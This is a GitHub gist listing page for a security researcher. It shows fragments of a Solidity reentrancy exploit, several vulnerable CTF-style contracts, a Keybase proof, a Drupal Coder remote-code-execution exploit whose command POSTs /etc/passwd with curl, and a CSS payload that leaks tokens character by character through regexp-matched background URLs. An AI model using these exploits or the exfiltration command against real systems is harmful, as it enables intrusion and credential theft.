Skip to content

Instantly share code, notes, and snippets.

View reentrancy.sol
import './Lighthouse.sol';
import './RobotLiability.sol';
import './XRT.sol';
contract Exploit {
event Log (
string _log
Lighthouse public lighthouse;
View pirateship.solidity
pragma solidity ^0.4.19;
contract PirateShip {
address public anchor = 0x0;
bool public blackJackIsHauled = false;
function sailAway() public {
require(anchor != 0x0);
address a = anchor;
View callmemaybe.sol
contract CallMeMaybe {
modifier CallMeMaybe() {
uint32 size;
address _addr = msg.sender;
assembly {
size := extcodesize(_addr)
if (size > 0) {
View wheeloffortune.solidity
pragma solidity ^0.4.16;
contract WheelOfFortune {
Game[] public games;
struct Game {
address player;
uint id;
uint bet;
uint blockNumber;
View azino777.solidity
pragma solidity ^0.4.16;
contract Azino777 {
function spin(uint256 bet) public payable {
require(msg.value >= 0.01 ether);
uint256 num = rand(100);
if(num == bet) {

Keybase proof

I hereby claim:

  • I am raz0r on github.
  • I am raz0r ( on keybase.
  • I have a public key ASAsfmALvy1Q-Jzq4XYRXituwi1wEKo-OxxTAfPUYhZn2Ao

To claim this, I am signing this object:

Raz0r / drupal-coder-rce.php
Created Jul 22, 2016
View drupal-coder-rce.php
# Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039)
# by Raz0r (
$cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd";
$host = "http://localhost:81/drupal-7.12/";
$a = array(
View rpo.css
@-moz-document regexp(".*token1=0.*"){*{background:url(//}}
@-moz-document regexp(".*token1=1.*"){*{background:url(//}}
@-moz-document regexp(".*token1=2.*"){*{background:url(//}}
@-moz-document regexp(".*token1=3.*"){*{background:url(//}}
@-moz-document regexp(".*token1=4.*"){*{background:url(//}}
@-moz-document regexp(".*token1=5.*"){*{background:url(//}}
@-moz-document regexp(".*token1=6.*"){*{background:url(//}}
@-moz-document regexp(".*token1=7.*"){*{background:url(//}}
@-moz-document regexp(".*token1=8.*"){*{background:url(//}}
@-moz-document regexp(".*token1=9.*"){*{background:url(//}}
You can’t perform that action at this time.